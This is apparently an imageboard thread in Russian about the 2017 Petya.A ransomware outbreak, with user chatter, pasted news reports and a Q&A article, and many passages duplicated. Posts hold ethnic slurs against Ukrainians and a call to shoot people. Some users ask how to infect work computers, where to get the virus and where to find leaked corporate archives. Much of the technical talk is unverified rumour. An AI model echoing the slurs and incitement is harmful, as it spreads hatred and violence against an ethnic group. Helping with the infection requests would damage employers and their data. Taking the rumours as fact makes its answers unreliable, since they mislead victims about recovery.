Ну вот и пизда хохлам!
расстреливать на месте! как дидов диды
>2017
>правительственные компьютеры с выходом в интернет
>на винде
>правительственные компьютеры с выходом в интернет
>на винде
Короче, как мне заразить компы у себя на работе?
Мимо коллектор
Мимо коллектор
Хохлуту же.
Отсоси у программиста.
"Если машина смотрит в интернет "белым" (маршрутизируемым) адресом и открыт 445 порт..."
А что не так, даун?
а если закрыт, где скачать вирус можно?)
Хохол, спок.
надо быть конченным, что бы в 2к17 году юзать винду.
проверка диска на ошибки вроде. иль нет? ангельский не знаю. только deutsch
зачем тебе вирус если ты можешь взять и всё сломать без него
вопрос отменяется. не прочел до конца там.
да
не получить пизды потом?
присмотрелся. на самом деле это фейковая проверка диска. а реально - шифрование его. в норме другие надписи
На XP скорее всего, причем.
Самый страшный вирус - хохлушка за компом.
В сети была инфа, что на pastebin утекли архивы топов роснефти. Доставьте ссылку на эти архивы
За щекой проверяй
>Я скозал!
ну, да, лучше сборочку линя накатить и и держать маня-контору для ее поддержки
Вирусы-шифровальщики скозали)
есть такая версия:
Вирус Petya.A чаще всего распространяется через спам-сообщения электронной почты, содержащие ссылки на скачивание файлов с Dropbox под названием "приложение folder-gepackt.exe". Когда файл загружается и открывается, активируется вирус.
>gepackt
Немцы?
>Башнефти
>Роснефти
>украинских банков
Дайте угадаю, выглядит это так - все эти необучаемые уебки сидят на сперме образца эдак 2012-года, где стоит только ихнее кустарное ПО, какое-нибудь 1с и больше нихуя.
>Роснефти
>украинских банков
Дайте угадаю, выглядит это так - все эти необучаемые уебки сидят на сперме образца эдак 2012-года, где стоит только ихнее кустарное ПО, какое-нибудь 1с и больше нихуя.
лел, качать exe файлы в 2к17
пока путь заражения толком никто не знает. ждём
но нашёл за прошлый год ещё про эту петю статейки
http://bedynet.ru/petya-вирус/
Чекайте баланс онлайн
https://blockchain.info/address/1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX?sort=0
https://blockchain.info/address/1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX?sort=0
Так мы и перешли по твоей сслыке, рыбак.
за щекой поищи рыбаков
я её спрятал кагбе
>спермопроблемы
хуйпизда!11!
Мало платите - получайте хуёвых работников. Может дойдёт до руководства, что лучше лишний лям не себе в офшор, а на нормальных админов потратить.
Уже биткоин накидали.
Меня эито вобще должно как то беспокоить? Роснефть еще что то там, да гори оно все синим пламенем.
Что за аутист писал тексты на скринах? Явно не в ладах с инглишем.
>предложено перевести $300 в биткоинах по указанному адресу
Теперь надеюсь всем понятно для чего нужен БИТОК?
Теперь надеюсь всем понятно для чего нужен БИТОК?
Нормально там всё, я смог перевести текст.
майнеры поднимают стоимость биткоина
Для преступников.
>юсь всем понятно для чего нужен БИТ
Я майнир, у миня кредит, курс падает. А заебошука я вирус.
намекаешь что биток будет следующим после телеграммы этой вашей?
Блять, я не пойму, у них что там, вся Роснефть одновременно кликала по ссылка и скачивала эту парашу?
Да. Но параллельно власти создадут крипторубль и разрешат только его.
А может у них локалка, м?
есть версия что кликнул кто-то один. а оно разошлось по сети через дыры.
пока толком ничего не известно
А прикол это сисадмин случайно кликнул, когда порнуху смотрел.
>крипторубль
Курс которого будет ниже рубля
Ну так и хули, у них что там, все компы в сети с правами администратора?
Потому я смотрю порнуху с виртуалки.
мимоадмин
зная какие там порядки (непонаслышке) - да. вполне вероятно. админ заебётся в случае чего бегать по всем абиснять куда жать если что-то не работает. проще сразу права дать
Как к тебе коллеги относятся? Или вспоминают только когда что-то наебнётся?
И майнтиь его можно только на эльбрусе.
прикиньте какая сейчас чистка бурситетских сис админов пойдет....
ору
эльбрусы раскупят враз
нахера, курс же меньше рубля
и таки где эти ваши эльбрусы можно раскупить?
>В блоге «Лаборатории Касперского» появилась публикация с информацией о том, как происходит заражение. По словам автора, вирус распространяется в основном через HR-менеджеров, так как письма маскируются под сообщение от кандидата на ту или иную должность.
«HR-специалист получает фальшивое письмо со ссылкой на Dropbox, по которой якобы можно перейти и скачать «резюме». Вот только файл по ссылке является не безобидным текстовым документом, а самораспаковывающимся архивом с расширением .EXE», — рассказывает эксперт.
После открытия файла пользователь видит «синий экран смерти», после которого Petya.A блокирует систему.
Ну у них же должен стоять бесплатный аваст хотя-бы.
Двачаю. Не видел чтобы во время проверки нельзя было вырубать.
>Ну у них же должен стоять бесплатный аваст хотя-бы.
>Пидорашки
>Антивирус
Слишком заумно
не спасет. Его только Касперский видит и то вряд ли.
фиксую.это не то
Охуеть, Роснефть уже взяли на себя судебные функции
Щас эксперты из /s/ пояснят что
>2017
>антивирус
>не переходить по внешним ссылкам
>смотреть на расширение файла
Офисный планктон из одной компании подвергшейся атаке репортинг ин. Минут за десять наебнулась вся локалка в офисе (компов 15-20). Я в этот момент делал отчетик, ничего не качал весь день, так что распространение наверно может идти и через один комп. Появилось сообщение, что комп выключится через минуту, поптом фейковый чек диск и красный шрифт со скринов выше. Шарящие аноны подскажите, данным реально пизда? И никак не восстановить? У айтишника нехило припекло кстати.
государство много лет работает на то чтобы самых тупых, лояльных и послушных даунов поднять наверх. а ты чему-то удивляешься
>И никак не восстановить?
Не, ну в принципе можно, только подбор ключа займёт пару лет.
> Появилось сообщение, что комп выключится через минуту,
анальная 10-ка?
> Petya.A жрёт жесткие диски
Всё что я хотел увидеть. Спасибо.
есть кое-какие бестолковые инструкции про то как вернуть комп к жизни. в частности восстановление сделать (или руками реестр вернуть). либо загрузочную запись пофиксить. но это всё не поможет при расшифровке файлов.
напоминает гифку, где собака бросалась на свою заднюю лапу.
>от 59$
>48 долларов в год
>От 96 долларов
Уноси это говно. Юзаю веракрипт и гуглдрайв - 0 в год, брат жив.
это было не в тему
В комментах троллеркоастер.
Семерка у всего офиса
По факту.
1. Уязвимы ВСЕ OS Windows, включая 10-ку с последними обновлениями
2. Распространяется молниеносно по сети, явно эксплуатируя SMB уязвимость.
3. Антивирусные компании решений пока не предоставили (NOD, Symantec, Fortinet), есть подтвержденные (лично) заражения ПК с решениями от данных компаний. Некоторые публичные ресурсы этих компаний — вообще лежат, например fortiguard.com.
4. Действительно шифрует MBR, GPT вроде бы не трогает. Оставляет на локальных дисках файл readme с текстом, аналогичном выводимому при загрузке. Несистемные диски (в т.ч. сетевые) — НЕ шифрует.
5. При перезагрузке выводит имитацию checkdisk.
1. Уязвимы ВСЕ OS Windows, включая 10-ку с последними обновлениями
2. Распространяется молниеносно по сети, явно эксплуатируя SMB уязвимость.
3. Антивирусные компании решений пока не предоставили (NOD, Symantec, Fortinet), есть подтвержденные (лично) заражения ПК с решениями от данных компаний. Некоторые публичные ресурсы этих компаний — вообще лежат, например fortiguard.com.
4. Действительно шифрует MBR, GPT вроде бы не трогает. Оставляет на локальных дисках файл readme с текстом, аналогичном выводимому при загрузке. Несистемные диски (в т.ч. сетевые) — НЕ шифрует.
5. При перезагрузке выводит имитацию checkdisk.
Дети в е ещё не понимают, что такое количество вирусов под винду обусловлено лишь её популярностью, был бы популярен линукс, каждый день на нулевой были бы треды о шифровальщиках под линукс.
кстати про минуту. такая же хуйня была с WANNACRY. признак заражения через SMB
нет, нужно накатывать ежедневно 50 обновлений и патчей, на последней версии 10 ?
заплатку после эпидемии WANNACRY ставили? или всем похуй как всегда?
Сегодня в бухгалтерии заразилось три компа, два из которых при включений ругались на отсутствие системного диска. Третий же включался с красным экраном вымогателя. КОгда зашел на него с Live CD, увидел пустые диски. На тех двух компах стояли MSE, которые, похоже, уничтожили вирус. Никаких записок нет. Повреждены все документы и часть БД бухгалтерского софта. На эти три ПК за последние сутки ничего не качалось. Есть подозрение, что заражение произошло через один из бухгалтерских софтов.
Да уже не банков, лол, в украшке только что распространили сообщение вырубить все компьютеры к хуям, у них там от метрополитена и аэропортов до укэнерго и мвд атакованы.
Хохлы уже успели заявить, что "не вызывает сомнений, что атаку организовал Путин, потому что мы находимся в состоянии гибридной войны", лол.
Украшки в очередной раз показали себя как пидорашки. Большая пыня им вместо европейских ценностей сулит. Пидорашки не меняются, даже если они в Украине.
Зачем пиздеть о том в чем не разбираешься?
>включая 10-ку с последними обновлениями
Либо это ебаный пиздежь, либо соснут ВСЕ.
ВОЛОДИН НЕ ГЕЙ Я СКОЗАЛ! ПРЕКРАТИТЕ НЕМЕДЛЕННО!
Заражены компы, на которых установлен бухгалтерский софт.
а остальные точно такие же но без бухгалтерского софта не заражены да?
>и часть БД бухгалтерского софта
так вам и надо, дауны.
базы не должны там находиться. как и документы.
сэкономили на правильном админе - сосите хуй.
Дай угадаю? 1с? Хохол не палится
Представители "Мегафона" заявили, что не выявили заражения новой вредоносной программой. Услуги связи оказываются оператором в полном объеме.
Аналогичную информацию озвучили в пресс-службе "Вымпелкома" и Tele2. Сети МТС также работают в штатном режиме. Представители компании подчеркнули, что оператор обладает глубокой экспертизой в защите от киберугроз.
Ранее сообщалось, что вирус-вымогатель Petya.A атаковал нефтяные, телекоммуникационные и финансовые компании РФ и Украины. Программа блокирует компьютеры и требует 300 долларов в биткоинах за восстановление доступа к файлам. Среди жертв вирусной атаки оказались "Роснефть", "Башнефть", Mars, Nivea и производитель шоколада Alpen Gold Mondelez International.
По данным представителей международной исследовательской команды "Лаборатории Касперского" вирус распространился не только в России и на Украине, но и по всему миру
Аналогичную информацию озвучили в пресс-службе "Вымпелкома" и Tele2. Сети МТС также работают в штатном режиме. Представители компании подчеркнули, что оператор обладает глубокой экспертизой в защите от киберугроз.
Ранее сообщалось, что вирус-вымогатель Petya.A атаковал нефтяные, телекоммуникационные и финансовые компании РФ и Украины. Программа блокирует компьютеры и требует 300 долларов в биткоинах за восстановление доступа к файлам. Среди жертв вирусной атаки оказались "Роснефть", "Башнефть", Mars, Nivea и производитель шоколада Alpen Gold Mondelez International.
По данным представителей международной исследовательской команды "Лаборатории Касперского" вирус распространился не только в России и на Украине, но и по всему миру
Ребят, не шарю в этих вещах, но могу ли я заиметь петю через торрент? Качаю сейчас игрушку и чет очко жмется
Да. С моей пекарней все ок.
Это тоже, но как ни странно, базы 1с не затронуло, зато документы, находящиеся в папке с базой, зашифровались.
твой комп залатан от wannacry?
а бухгалтерские компы залатаны? ~были~
>Да. С моей пекарней все ок.
Еще бы ты как то пруфы предоставил и я бы спал спокойно.
Разумеется, в кряк подсунуть вместо экзешника. Ты еще и сам антивирусник вырубишь, когда всплывет просьба.
И вообще ничего качать ничего не надо, достаточно иметь открытый порт и уязвимость, которую ты разумеется не пофиксил, потому что обновляешь шиндоус раз в год. Так что не ссы, оно само тебя найдет.
На всех стоит одинаковая семерка.
Пруфы чего? Крякозябров в doc и xls файлов? Так я не на работе уже, лол.
ну так я сейчас докачаю, офну адаптер и все. Просканирую антивирусом папку
весь вопрос в том насколько одинаковая
Всем приготовиться
Вообще одинаковая. Даже шара. У меня только 1с и прочего бух говна нет.
Ебать какая мощная хакерская атака, пиздец просто. Это они ещё с по от майл ру не боролись.
Сталкер 2 на подходе.
Уверен что нашему айтишнику было похуй, вот видимо у него и припекло знатно.
я медленно надеваю хим защитный костюм
Нехуйственно маркетологи пиар ему мутят.
Бре-хня!
АЭС по "ГОСТу" не имеют контактов с сетью Internet. Они ПОЛНОСТЬЮ АВТОНОМНЫ.
Хохлы под шумок угрожают и клянчат денег.
То-то мой кореш ебашит в дотку на ночном дежурстве на чаэс.
>Чернобыльская АЭС также подверглась кибератаке
>В связи с кибератакой не работает сайт Чернобыльской АЭС.
Дело нешуточное, блядь.
Я думал погромисты умные люди и так не расписывают свои вирусы.
Служба безопасности Украины установила источник вируса Petya, поразившего госучреждения и украинские компании во вторник.
Об этом спецслужба сообщает в Facebook.
«По данным СБУ, подавляющее большинство заражений операционных систем происходила через открытие вредоносных приложений (документов Word, PDF-файлов), которые были направлены на электронные адреса многих коммерческих и государственных структур», — сказано сообщении.
Атака использовала сетевую уязвимость MS17−010, в результате эксплуатации которой на инфицированную машину устанавливался набор скриптов, используемых злоумышленниками для запуска шифровальщика файлов Petya.A.
«Вирус атакует компьютеры под управлением ОС Microsoft Windows путем шифрования файлов пользователя, после чего выводит сообщение о преобразовании файлов с предложением произвести оплату ключа дешифрования в биткоинах в эквиваленте суммы $ 300 для разблокировки данных. На сегодня зашифрованные данные, к сожалению, расшифровке не подлежат», — сказано в сообщении.
Об этом спецслужба сообщает в Facebook.
«По данным СБУ, подавляющее большинство заражений операционных систем происходила через открытие вредоносных приложений (документов Word, PDF-файлов), которые были направлены на электронные адреса многих коммерческих и государственных структур», — сказано сообщении.
Атака использовала сетевую уязвимость MS17−010, в результате эксплуатации которой на инфицированную машину устанавливался набор скриптов, используемых злоумышленниками для запуска шифровальщика файлов Petya.A.
«Вирус атакует компьютеры под управлением ОС Microsoft Windows путем шифрования файлов пользователя, после чего выводит сообщение о преобразовании файлов с предложением произвести оплату ключа дешифрования в биткоинах в эквиваленте суммы $ 300 для разблокировки данных. На сегодня зашифрованные данные, к сожалению, расшифровке не подлежат», — сказано в сообщении.
Не вижу слова РОССИЯ
ну сначала кукарекнули традиционно. а потом стали разбираться
напоминаю. MS17−010 = дыра через которую залазил WANNACRY Аноним 27/06/17 Втр 19:24:06 #126 №1059963
.
Зависит от страны проживания.
ПИдорахии же.
Депутат Верховной Рады и советник министра внутренних дел Антон Геращенко утверждает, что письма с вирусом, поразившим украинские компание и учреждений, приходили им в течение месяца.
Тупые хохлы сами себе проблемы создают.
Т.е. если я сделаю бэкап анимы архивом, а потом переименую его в ANUIDISUDA.UBLUDOKMATTVOU, то шифровальщику будет похуй на этот файл?
такой?
Да. У бухов осталось куча бэкапов, сделанных именно таким способом.
Мимо все тот же счастливчик, у которого три бухгалтерши подцепили вирус в одно и то же время.
Типа того, но подозрительных .exe файлов не запускалось. Фейковое окно проверки диска точно такое же. "Проверка" длилась минут 20.
возможно. НИЗНАЮ ЯНЕ ХАКИР
например wannacry.a может путешествовать по сети по 445 порту.
Кроме линуксобогов.
видео ускорено. а вирус замаскирован под само распаковывающийся архив. который обычный .exe
по крайней мере вирус 2016 года.
А это уже модификация походу того вируса.
есть версия почему не заразился ты а заразились они. они РАНЕЕ могли нажимать на заразу. а активаровалась она только сейчас. Геращенко говорит про это
(это если заражение не через SMB пошло)
Хули все ссыкуют петю ? Юзлесс кусок дерьма, удалить которое нет проблем, просто долбоебы раздули про суперхуцкеров, ибо сами обсераются увидев окошко выбора после некорректного выключения пк.
Чет читнул тред, ни одного совета по превентивной защите. Что делать-то: 3 порта закрыть и скачать обнову, которую пару месяцев назад рекомендовали скачать везде? Или еще что-то?
Документы на двух ПК зашифровались в одно и то же время (с точностью до секунды). В логе антивируса указано, что он успешно удалил Petya.A за пару минут до изменения документов. Повторные сканирования ничего не нашли. Вряд ли антивирус молчал бы несколько дней. В истории скачивания ни одного exe за месяц.
Ничего не делай, кому твой пк нужен ?
>4. Действительно шифрует MBR, GPT вроде бы не трогает. Оставляет на локальных дисках файл readme с текстом, аналогичном выводимому при загрузке. Несистемные диски (в т.ч. сетевые) — НЕ шифрует.
>
Понятно что не нужен, но заражение же рандомно происходит.
>антивирус
Одна из самых бесполезных программ в мире, обойти это дерьмо сможет даже школьник, который говонокодит на питоне.
Пиздеж. Покоцал доки на всех дисках, в т ч на съемных. Никаких записок не оставил.
А под системным диском подразумевается логический или физический?
Я так понимаю, можно просто винду переустановить с форматацией и норм?
Да, но этот самый MSE не дал улететь вообще всему; винду удалось поднять через bootrec /fixmbr. А пк без антивируса пришлось форматировать к хуям.
Ну словишь вирус и фиг с ним, пофиксить его как 2 пальца обоссать.
А что не покоцал? Образы True Home Image коцает?
в двух словах если у тебя винт больше 2тб, не ссы
Ну пофикси. А я тебе 1к на карту скину.
>эйчары
>грамотные
Так напиши плиз. Я ж говорю, в треде не видел.
У меня меньше к сожалению. Но выше пишут, что на съемных тоже коцает.
фикс за 300$ в виде ключа
Петя плиз
Зачем они требуют суммы в сотни долларов? Требовали бы там по паре долларов, намного больше людей бы платило. Ещё акции было бы неплохо устраивать, вроде зарази машину знакомого/соседа/корпорации, получи скидку в 20%.
подожди, создам новый биткоин кошелёк.
Что там фиксить ? Не дайте ему зашифровать и всё, чекаешь процессы и видишь что-то подозрительное удаляшь файл от которого это исходит, если он просто выкинет на экран мол, ебать я всё заблокировал, сасай кудасай, офаешь пк с резетки, ибо он не мог так быстро всё зашифровать и просто тянет время пока ты обмазываешь стул повидлом.
Так они корпорации заражают, а те бохатые
Мои бухи заметили что что-то неладное, когда открыли xls файлы и увидели крякозябры вместо привычных таблиц. Как ты представляешь себе чекать процессы 24/7?
Ну я тоже про розетку подумал. А дальше то что? Форматнуть сис.диск?
Алсо, я сплю с включенным компом, он может и ночью ВТАЙНЕ все зашифровать успеть. Тьфу-тьфу-тьфу
Ну подобное грузит систему, так что если у тебя вместо обычных 10% загружено больше, проверяешь процессы.
Удалять то, что скачал перед этим, акронисом/командной строкой/любым другим способом.
Неплохая мысль, вот только бы за каждого зараженного и выплатившего получаешь 2% да даже 1%, тогда бы сотрудники с большим желанием клацали на всё попало, перед тем как выкидывать в чекдиск надо ввести номер свой карты для получения бонуса.
Ты тупенький. На банкомате тоже по-твоему, что-то качали?
А вирусняк-то только в эксешнике может быть или других форматах тоже?
банкоматы скачивают обновления, если ты не знал.
Карточку с вирусом вставили
с рабочей станции в роснефти
дайте чаю этому господину
Под многие форматы можно спрятать вирус.
Вирус попадает на пеки в Украине через программу M.E. doc. Так что мамкиным хикканам бояться нечего.
https://antikor.com.ua/articles/176649-virus_petya.a_v_kieve_bankomaty_nachali_prositj_denjgi
Вот поэтому мои бухи его подцепили, а я - нет.
https://antikor.com.ua/articles/176649-virus_petya.a_v_kieve_bankomaty_nachali_prositj_denjgi
Вот поэтому мои бухи его подцепили, а я - нет.
Охуеешь тогда удалять все накачанное
Охуенно. World war 3.0
У него вирусы в этих вебмах, не открывайте.
Зима близко
Winter is coming
Кибер Коммандование - сидит итт и активно поддерживает анбшные эксплоиты.
ФСБ - пожелал лично расправиться с хакерами физически.
Майкрософт - предложил СКАЧАТЬ ОБНОВЛЕНИЕ, а не сидеть на жопе.
8200 - предлагает больно и унизительно ПОКАРАТЬ ИХ СВОИМ STUXNET'OM
Сноуден - предложил снять документальный фильм про ОХУЕВШИХ ПРОГРАММИСТОВ.
КНДР ХРАНИТ МОЛЧАНИЕ.
Symantec - высрал два невнятных твита.
КАСПЕРСКИЙ - В панике, плачет, т.к. никто не покупает подписку.
Китай - Надеется, что фаерволл остановит этот хаос.
АНБ - Нерво покуривает, т.к. зашифровался главный вход в Форт Мид.
ФСБ - пожелал лично расправиться с хакерами физически.
Майкрософт - предложил СКАЧАТЬ ОБНОВЛЕНИЕ, а не сидеть на жопе.
8200 - предлагает больно и унизительно ПОКАРАТЬ ИХ СВОИМ STUXNET'OM
Сноуден - предложил снять документальный фильм про ОХУЕВШИХ ПРОГРАММИСТОВ.
КНДР ХРАНИТ МОЛЧАНИЕ.
Symantec - высрал два невнятных твита.
КАСПЕРСКИЙ - В панике, плачет, т.к. никто не покупает подписку.
Китай - Надеется, что фаерволл остановит этот хаос.
АНБ - Нерво покуривает, т.к. зашифровался главный вход в Форт Мид.
поделись exe'ником
Габен - в общем хл3 не будет
Это новый петя.
Если хохол, то это медок, слишком много жалоб на эту хуйню отовсюду.
Вроде бы в виндоус нужно отдельно ставить галочку над опцией, которая показывает действительное расширение файла. Как и со скрытыми папками.
Да уже нагуглил, что медок. Пиздос. Можно этих уебанов засудить? На их сайте пусто, поддержка морозится.
https://blockchain.info/address/1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX
уже почти 3 (лол) BTC
уже почти 3 (лол) BTC
М? Расшифруй
лол
это кошелек вымогателя, 7к долларов уже
>7к долларов
Чет маловато. Я думал из-за масштабов он уже миллионер.
Просто потихоньку переводятся долбаебы, которые деньги вымогателям платят.
да вряд ли, скорее всего руководство медка уже запаковало чемоданы в израиль
>Касперский
>Русский рэпер
Касперский от Wannacryptа не спас
MSE увидел и удалил петю, но тот все равно каким-то хуем умудрился зашифровать доки.
мне лично аутпост помог. но не от wannacry а раньше. от майнера юзающего ту же дыру
qqss77889900.exe
оно пыталось в автозагрузку залезть. аутпост спросил пускать ли. конеш сразу было видно что это зараза. сначала причём непонятно откуда взявшаяся (win7 без обнов)
https://virustotal.com/en/file/04179266d6958f93570732719acef1164d4e593369ab677bc6998aa37a40fd26/analysis/
Ну так и не пизди.
Ин бифор: > кококомпилировать твой вирус придёца на каждой системе, я скококзал!
10 вопросов о самой масштабной кибератаке в истории Украины Аноним 27/06/17 Втр 22:27:18 #204 №1060755
1. Кого поразил вирус?
Неизвестный вирус поразил сети целого ряда крупных компаний, в том числе крупных государственных. Известно, что вирус атакует компьютеры на базе Windows.
Около 13.30 "Стране" стало известно о хакерской атаке на "Ощадбанк". При этом в официальном сообщении банк поначалу заявлял, что никакой атаки не было – якобы компьютеры в отделениях перестали работать из-за плановых технических работ.
Известно, что вслед за "Ощадом" вирус охватил также банк "Пивденный", "Укргазбанк", "ТАСКОМБАНК", и небанковские предприятия, среди которых – энергокомпания "Киевэнерго", "Укрпочта", аэропорт "Борисполь", "Укразализныця". Атаке подверглись и негосударственные компании, например, "Новая почта". Вирус даже парализовал сайты всех СМИ Украинского медиахолдинга. От вируса-захватчика также перестала работать вся интернет-сеть Кабинета министров. Уже известно, что вирус атаковал и заправки.
Хакерской атаке подверглись также некоторые крупные госкомпании в России. В частности, о "мощной хакерской атаке" на свои сервера заявила "Роснефть".
Пока неизвестно, являются ли хакерские атаки в Украине и России действиями одной группы лиц.
Полный список пораженных вирусом компаний "Страна" уже собрала. Список постоянно обновляется.
2. Что это за вирус?
IT-специалисты говорят, что это вирус который называется Petya A или mbr locker 256, который относится к вирусам-вымогателям.
MBR - это главная загрузочная запись, код, необходимый для последующей загрузки ОС и расположен в первом секторе устройства. После включения питания компьютера проходит так называемая процедура POST, тестирующая аппаратное обеспечение, по прохождению которой BIOS загружает MBR в оперативную память по адресу 0x7C00 и передает ему управление. Так вирус попадает в компьютер и поражает его. Модификаций вируса существует много.
Специалисты утверждают, что вирус является аналогом WannaCry, который в мае нанес миллиардный ущерб мировой экономике.
3. Как происходит "заражение"?
Как стало известно "Стране" из источников в одном из коммерческих банков, вирус-вымогатель активизируется с помощью ссылки, которая присылается на почту из неизвестного адреса.
Заражение идет через открытие писем. При заражении система падает и пользователь обычно пытается сделать перезагрузку. Но как отмечают эксперты, именно этого делать не стоит: после нее идет полная блокировка системы. Но пока достоверной информации о вирусе нет.
4. Какие симптомы?
Вирус распространяется очень быстро. За несколько часов он поразил десятки компаний по всей Украине.
Симптомы заражения неизвестным вирусом проявляются в отказе работы компьютеров на платформе Windows. Компьютеры перегружаются, а вся информация на них зашифровывается.
Айтишники одной из киевских редакций, проверили один из зараженных компьютеров, и оказалось, что вирус уничтожил все данные на жестком диске.
5. Чего хотят хакеры?
О требованиях вируса стало известно по фото экрана, который появляется при заражении компьютера. На данный момент известно, что вирус блокирует компьютер, а ключ к разблокированию продает за биткоины в эквиваленте $300.
"Хакеры требуют выкуп с биткоинами, но вы же понимаете, если "ляжет" банковская система Украины, хакеры от этого смогут получить профит гораздо больше, чем просто с биткоинов. Нужно следить за транзакциями. Не исключено, что под ударом окажется финмониторинг", – сообщил "Стране" IT-специалист.
6. Как лечить?
Самостоятельно – никак. Когда хакеры получат деньги, обещают прислать код, с помощью которого можно будет разблокировать компьютеры.
7. А это вообще лечится?
Глава ИнАУ Александр Федиенко не советует пользователям пораженных компьютеров соглашаться на требования хакеров и перечислять им деньги. По его словам, "вылечиться" уже не получится.
"Ни в коем случае нельзя перечислять им деньги. Это развод. Никакой код, никакая инструкция не поможет избавиться от вируса. Из того, что проанализировали наши специалисты, ясно, что из-за вируса идет полное шифрование файлов. Всю пораженную вирусом технику можно просто выбросить на помойку. От вируса вылечить компьютеры нереально. Если уже началось шифрование, это уже всё", – сказал "Стране" Федиенко.
8. Какова цель хакеров?
По мнению IT-экспертов, с которыми поговорила "Страна", так как вирус поразил не единичные компании и не ограничился банковскими учреждениями, хакеры намерены нанести ущерб всей экономике Украины.
"Чего хотят добиться хакеры – это скорее вопрос к психологам. Я не знаю. Но сейчас они уже добились того, что в экономике страны случился коллапс. Все застыло. Эта атака, я считаю, была сделала из экономических побуждений, нанести ущерб целой стране, а не отдельным компаниям. Скорее всего, эта атака приведет к большим экономическим убыткам. Это элемент терроризма. Кибер-тероризм", – комментирует Александр Федиенко.
9. Как защититься от вируса?
1) Обязательно пользоваться антивирусами. По мнению специалиста, Virus "Petya А" блокирует сервис Avast, тога как "Касперский" этот вирус не видит. Принудительно обновите базу антивируса и операционные системы.
2) Не скачивать сторонние программы и файлы.
3) Не переходите по сторонним подозрительным ссылкам, в том числе, из соцсетей. Особенно если они исходят от неизвестных вам пользователей. Хотя, по словам Федиенко, не стоит открывать вообще никакие файлы и программы, даже если вам их присылают ваши знакомые. Или пропускать их через антивирусы.
4) Если заражение все-таки произошло, после заражения не перезагружайте компьютер! Этим вы активируете вирус.
"К сожалению, других, более подробных и конкретных рекомендаций пока дать нельзя, потому что до сих пор не ясно до конца, что это за вирус", – говорит Александр Федиенко.
10. Кто стоит за хакерской атакой?
Пока неизвестно. Но то, что атака нацелена на экономику всей страны, говорит о факте вмешательства извне.
Советник министра МВД Антон Геращенко уже заявил, что кибератака под видом вируса-вымогателя была организована со стороны спецслужб РФ.
По словам Федиенко, недавно аналогичный вирус распространялся в Европе.
"Пока нет точных фактов, что это за вирус и откуда он пришел. Но я читал в иностранной прессе, что в Европе недавно была похожая атака. Но она развивалась очень медленно и вяло. Просто в связи с тем, что украинский сегмент интернета очень высокоскоростной, плюс хорошее проникновение абонентов, в Украине этот вирус распространяется молниеносно. Грубо говоря, за полчаса заражено пол-страны", – говорит Федиенко.
Специалист отмечает, что наша страна де-факто оказалась неготовой к такой кибератаке. "Это звездный час подразделения по кибербезопасности. Наши компетентные службы сейчас должны тщательно и быстро все проанализировать и дать четкие рекомендации нашей отрасли, как реагировать и как бороться с вирусом", – отмечает Александр Федиенко.
https://antikor.com.ua/articles/176664-10_voprosov_o_samoj_masshtabnoj_kiberatake_v_istorii_ukrainy сайт может быть заблочен
Неизвестный вирус поразил сети целого ряда крупных компаний, в том числе крупных государственных. Известно, что вирус атакует компьютеры на базе Windows.
Около 13.30 "Стране" стало известно о хакерской атаке на "Ощадбанк". При этом в официальном сообщении банк поначалу заявлял, что никакой атаки не было – якобы компьютеры в отделениях перестали работать из-за плановых технических работ.
Известно, что вслед за "Ощадом" вирус охватил также банк "Пивденный", "Укргазбанк", "ТАСКОМБАНК", и небанковские предприятия, среди которых – энергокомпания "Киевэнерго", "Укрпочта", аэропорт "Борисполь", "Укразализныця". Атаке подверглись и негосударственные компании, например, "Новая почта". Вирус даже парализовал сайты всех СМИ Украинского медиахолдинга. От вируса-захватчика также перестала работать вся интернет-сеть Кабинета министров. Уже известно, что вирус атаковал и заправки.
Хакерской атаке подверглись также некоторые крупные госкомпании в России. В частности, о "мощной хакерской атаке" на свои сервера заявила "Роснефть".
Пока неизвестно, являются ли хакерские атаки в Украине и России действиями одной группы лиц.
Полный список пораженных вирусом компаний "Страна" уже собрала. Список постоянно обновляется.
2. Что это за вирус?
IT-специалисты говорят, что это вирус который называется Petya A или mbr locker 256, который относится к вирусам-вымогателям.
MBR - это главная загрузочная запись, код, необходимый для последующей загрузки ОС и расположен в первом секторе устройства. После включения питания компьютера проходит так называемая процедура POST, тестирующая аппаратное обеспечение, по прохождению которой BIOS загружает MBR в оперативную память по адресу 0x7C00 и передает ему управление. Так вирус попадает в компьютер и поражает его. Модификаций вируса существует много.
Специалисты утверждают, что вирус является аналогом WannaCry, который в мае нанес миллиардный ущерб мировой экономике.
3. Как происходит "заражение"?
Как стало известно "Стране" из источников в одном из коммерческих банков, вирус-вымогатель активизируется с помощью ссылки, которая присылается на почту из неизвестного адреса.
Заражение идет через открытие писем. При заражении система падает и пользователь обычно пытается сделать перезагрузку. Но как отмечают эксперты, именно этого делать не стоит: после нее идет полная блокировка системы. Но пока достоверной информации о вирусе нет.
4. Какие симптомы?
Вирус распространяется очень быстро. За несколько часов он поразил десятки компаний по всей Украине.
Симптомы заражения неизвестным вирусом проявляются в отказе работы компьютеров на платформе Windows. Компьютеры перегружаются, а вся информация на них зашифровывается.
Айтишники одной из киевских редакций, проверили один из зараженных компьютеров, и оказалось, что вирус уничтожил все данные на жестком диске.
5. Чего хотят хакеры?
О требованиях вируса стало известно по фото экрана, который появляется при заражении компьютера. На данный момент известно, что вирус блокирует компьютер, а ключ к разблокированию продает за биткоины в эквиваленте $300.
"Хакеры требуют выкуп с биткоинами, но вы же понимаете, если "ляжет" банковская система Украины, хакеры от этого смогут получить профит гораздо больше, чем просто с биткоинов. Нужно следить за транзакциями. Не исключено, что под ударом окажется финмониторинг", – сообщил "Стране" IT-специалист.
6. Как лечить?
Самостоятельно – никак. Когда хакеры получат деньги, обещают прислать код, с помощью которого можно будет разблокировать компьютеры.
7. А это вообще лечится?
Глава ИнАУ Александр Федиенко не советует пользователям пораженных компьютеров соглашаться на требования хакеров и перечислять им деньги. По его словам, "вылечиться" уже не получится.
"Ни в коем случае нельзя перечислять им деньги. Это развод. Никакой код, никакая инструкция не поможет избавиться от вируса. Из того, что проанализировали наши специалисты, ясно, что из-за вируса идет полное шифрование файлов. Всю пораженную вирусом технику можно просто выбросить на помойку. От вируса вылечить компьютеры нереально. Если уже началось шифрование, это уже всё", – сказал "Стране" Федиенко.
8. Какова цель хакеров?
По мнению IT-экспертов, с которыми поговорила "Страна", так как вирус поразил не единичные компании и не ограничился банковскими учреждениями, хакеры намерены нанести ущерб всей экономике Украины.
